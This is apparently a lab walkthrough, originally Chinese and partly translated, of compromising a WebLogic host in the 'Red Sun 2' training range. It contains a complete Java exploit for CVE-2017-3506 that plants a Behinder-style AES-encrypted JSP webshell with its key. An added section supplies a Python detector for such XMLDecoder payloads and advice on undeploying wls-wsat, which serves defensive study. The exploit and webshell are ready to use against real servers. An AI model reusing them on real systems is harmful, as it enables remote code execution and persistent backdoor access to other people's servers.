
Red Sun 2 (红日二)

Time: 2023-01-08 18:22:05  Views: 40
Tags: 红日 String wls 192.168 import conn out

Information gathering

Live host discovery: nmap -sS -T4 192.168.2.1/24

image-20221128151556484

The edge host is identified as 192.168.2.247

image-20221128151910562

192.168.2.165

image-20221128151921959

Reasons for that identification:

  1. A web service is running
  2. Remote Desktop (3389) is open

192.168.2.247

Port 80 is an IIS service; no exploitable point was found

image-20221128152932884

Port 7001 is also a web service; run a directory scan

image-20221128153229803

Visiting the /console route shows that the middleware is WebLogic

image-20221128153315896

Check it with a WebLogic vulnerability scanner

image-20221128154340592

Use the CVE-2017-3506 tool to write a webshell directly

image-20221128154918784

The shell written through that vulnerability turned out to only be able to run whoami, so CVE-2019-2725 was used instead

image-20221128155617699

成功获得webshell,但是这些shell都无法使用工具去连接

这里向通过rce进行下载远程木马并远程上线,无果

难受,只好看漏洞原理修改工具的木马为rebeyond木马,如下使用CVE-2017-3506进行攻击写入冰蝎马

import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStreamReader;
import java.io.PrintWriter;
import java.net.URL;
import java.net.URLConnection;

public class Shell {
    public static String writeShell(String host, String wls_Wsat_Path, String shellName) {
        String shellPath = "servers/AdminServer/tmp/_WL_internal/wls-wsat/54p17w/war/" + shellName;
        String payload = "<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\"><soapenv:Header><work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\"><java><java version=\"1.4.0\" class=\"java.beans.XMLDecoder\"><object class=\"java.io.PrintWriter\"> <string>" + shellPath + "</string><void method=\"println\"><string><![CDATA[<%@page import=\"java.util.*,javax.crypto.*,javax.crypto.spec.*\"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals(\"POST\")){String k=\"e45e329feb5d925b\";/*this key is the first 16 characters of the 32-character md5 of the connection password; the default connection password is rebeyond*/session.putValue(\"u\",k);Cipher c=Cipher.getInstance(\"AES\");c.init(2,new SecretKeySpec(k.getBytes(),\"AES\"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>]]></string></void><void method=\"close\"/></object></java></java></work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>";
        PrintWriter out = null;
        BufferedReader in = null;
        String result = "";
        try {
            URL realUrl = new URL(String.valueOf(host) + wls_Wsat_Path);
            URLConnection conn = realUrl.openConnection();
            conn.setRequestProperty("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)");
            conn.setRequestProperty("Content-Type", "text/xml");
            conn.setRequestProperty("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8");
            conn.setDoOutput(true);
            conn.setDoInput(true);
            out = new PrintWriter(conn.getOutputStream());
            out.print(payload);
            out.flush();
            in = new BufferedReader(new InputStreamReader(conn.getInputStream()));
            String line;
            while ((line = in.readLine()) != null)
                result = String.valueOf(result) + line;
        } catch (Exception e) {
            System.out.println("[+] Success\n[+] " + host + "/wls-wsat/" + shellName);
        } finally {
            try {
                if (out != null)
                    out.close();
                if (in != null)
                    in.close();
            } catch (IOException ex) {
                ex.printStackTrace();
            }
        }
        return result;
    }

    public static void main(String[] args) {
        String host = "http://192.168.2.247:7001";
        String wls_Wsat_Path = "/wls-wsat/CoordinatorPortType11";
        String shellName = "ggbond.jsp";
        Shell.writeShell(host, wls_Wsat_Path, shellName);
    }
}
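A defender-side complement to the request shown above: both CVEs used in this write-up deliver their payload through a WorkContext SOAP header that WebLogic hands to java.beans.XMLDecoder, so the request body itself is the detection surface. The following Python script is an added example, not code from the original post or from any tool it mentions. It inspects HTTP requests that have already been parsed into dicts (the sample requests are constructed and embedded inline, not captured from the lab), flags the XMLDecoder object graph inside a WorkContext header, records the file path such a payload writes so a responder knows where to look on disk, and marks POSTs to the /wls-wsat/ endpoint that appears in the write-up. The dict shape, finding names and severity labels are my own assumptions.

```python
import re

# Constructed sample requests (not captured from the original write-up's lab).
# Only the first is shaped like a WLS-WSAT XMLDecoder deserialization attempt.
SAMPLE_REQUESTS = [
    {
        "method": "POST",
        "path": "/wls-wsat/CoordinatorPortType11",
        "body": (
            '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">'
            '<soapenv:Header><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">'
            '<java version="1.4.0" class="java.beans.XMLDecoder">'
            '<object class="java.io.PrintWriter">'
            '<string>servers/AdminServer/tmp/_WL_internal/wls-wsat/x/war/test.jsp</string>'
            '<void method="println"><string>PLACEHOLDER_CONTENT</string></void>'
            '<void method="close"/></object></java></work:WorkContext></soapenv:Header>'
            '<soapenv:Body/></soapenv:Envelope>'
        ),
    },
    {
        "method": "POST",
        "path": "/wls-wsat/CoordinatorPortType11",
        "body": (
            '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">'
            '<soapenv:Header/><soapenv:Body><ns:registerResponse/></soapenv:Body></soapenv:Envelope>'
        ),
    },
    {"method": "GET", "path": "/console/login/LoginForm.jsp", "body": ""},
]

# The WorkContext element in the SOAP header is where the XMLDecoder payload lives.
WORKCONTEXT_RE = re.compile(
    r"<\s*(?:\w+:)?WorkContext\b.*?</\s*(?:\w+:)?WorkContext\s*>", re.S | re.I
)
XMLDECODER_RE = re.compile(r"java\.beans\.XMLDecoder", re.I)
# XMLDecoder object-graph elements. Later filter bypasses avoided <object>
# but still need some of these to build an object, so match the family.
OBJECT_GRAPH_RE = re.compile(r"<\s*(?:object|void|class|array)\b", re.I)
# A PrintWriter-style write names the file it creates; record it for on-disk triage.
DROPPED_FILE_RE = re.compile(r"<string>\s*([^<]*?\.jsp)\s*</string>", re.I)


def inspect_request(req):
    """Return a verdict dict for one parsed request: severity, findings, dropped_file."""
    body = req.get("body", "")
    findings = []
    dropped_file = None
    ctx = WORKCONTEXT_RE.search(body)
    if ctx:
        fragment = ctx.group(0)
        if XMLDECODER_RE.search(fragment):
            findings.append("xmldecoder-in-workcontext")
        if OBJECT_GRAPH_RE.search(fragment):
            findings.append("object-graph-in-workcontext")
        match = DROPPED_FILE_RE.search(fragment)
        if match:
            dropped_file = match.group(1)
            findings.append("file-write-target")
    # The endpoint used in the write-up; a plain POST here is only a weak signal on its own.
    if req.get("method", "").upper() == "POST" and req.get("path", "").startswith("/wls-wsat/"):
        findings.append("post-to-wls-wsat")
    if any(f.endswith("in-workcontext") for f in findings):
        severity = "high"
    elif findings:
        severity = "medium"
    else:
        severity = "none"
    return {
        "path": req.get("path", ""),
        "severity": severity,
        "findings": findings,
        "dropped_file": dropped_file,
    }


def scan(requests):
    """Inspect a sequence of parsed requests and return one verdict per request."""
    return [inspect_request(r) for r in requests]


if __name__ == "__main__":
    for verdict in scan(SAMPLE_REQUESTS):
        print(verdict["severity"].upper(), verdict["path"], verdict["findings"], verdict["dropped_file"])
```

Run over proxy or WAF logs parsed into this shape, the high verdicts are worth treating as exploitation attempts rather than noise, and the recorded file path tells a responder which directory under the domain to check for a dropped JSP. The wls-wsat component exists only for WS-AtomicTransaction; on installations that do not use it, undeploying it removes the endpoint this write-up targets, which was Oracle's published workaround for this family of bugs before patching.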

Connected successfully

image-20221129173532754

Note: 192.168.2.159 192.168.2.161

From: https://www.cnblogs.com/seizer/p/17033834.html
